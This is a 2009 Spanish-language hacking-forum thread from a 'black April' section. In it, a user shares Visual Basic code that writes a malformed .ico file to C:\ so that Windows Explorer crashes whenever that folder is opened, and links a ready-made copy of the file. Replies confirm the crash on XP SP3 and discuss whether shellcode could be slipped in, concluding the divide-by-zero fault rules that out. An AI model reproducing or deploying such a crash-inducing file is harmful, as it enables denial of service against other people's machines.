Foro de elhacker.net

Seguridad Informática => Abril negro => Mensaje iniciado por: LeandroA en 16 Abril 2009, 05:07 am



Título: Explorer crash [Abril Negro]
Publicado por: LeandroA en 16 Abril 2009, 05:07 am
Hola este es un pequeño fuente para crashear el explorer,no es nada del otro mundo, creo que esto es algo viejo pero tenia entendido con con SP3 no funcionaba,bueno a ami porlomenso me casca el explorer y tengo SP3.

Código:
Option Explicit
Dim Arr(62) As Byte

Private Sub Form_Load()

Arr(2) = 1: Arr(4) = 1: Arr(12) = 32: Arr(14) = 40
Arr(18) = 22: Arr(22) = 40: Arr(34) = 1: Arr(36) = 32

Open "C:\caca.ico" For Binary As #1
    Put #1, , Arr
Close #1

End Sub

al ejecutarlo despues cuando abran la carpeta en disco C:\ explota el explorer

lo que hace crea una falsa imagen (en este caso es .ico pero puede ser cualquier otro formato) y inserta unos bits que probocan un error en el explorer al intentar obtener los datos de esta.

Para eliminar esta imagen, Ejecutar > CMD > Del C:\caca.ico


Saludos

a por las dudas el codigo es en Visual Basic

aca un ejemplo comprimido de la imagen (http://rapidshare.com/files/221884180/caca.zip.html)

la vajan y la descomprimen


Título: Re: Explorer crash [Abril Negro]
Publicado por: Karcrack en 16 Abril 2009, 13:26 pm
Buen aporte:
(http://img10.imageshack.us/img10/4616/dibujoxjf.png)
WinXP Sp3
Me imagino que se podria aprovechar para meter un ShellCode?... la verdad, no estoy muy metido en estos temas :-[ :xD

Saludos ;)

PD: No es muy dificil crashear un proceso por lo que estoy viendo ultimamente VB :rolleyes:


Título: Re: Explorer crash [Abril Negro]
Publicado por: Arkangel_0x7C5 en 16 Abril 2009, 14:07 pm
Buen aporte:
(http://img10.imageshack.us/img10/4616/dibujoxjf.png)

Me imagino que se podria aprovechar para meter un ShellCode?... la verdad, no estoy muy metido en estos temas :-[ :xD

Saludos ;)

PD: No es muy dificil crashear un proceso por lo que estoy viendo ultimamente VB :rolleyes:
No creo que puedas meter un ShellCode. ya que eso es error de división por Zero. Si fuera 0xC0000005 si podría funcionar

saludos


Título: Re: Explorer crash [Abril Negro]
Publicado por: ~~ en 16 Abril 2009, 15:01 pm
Interesante Leandro, te lo añado al post recopilatorio :P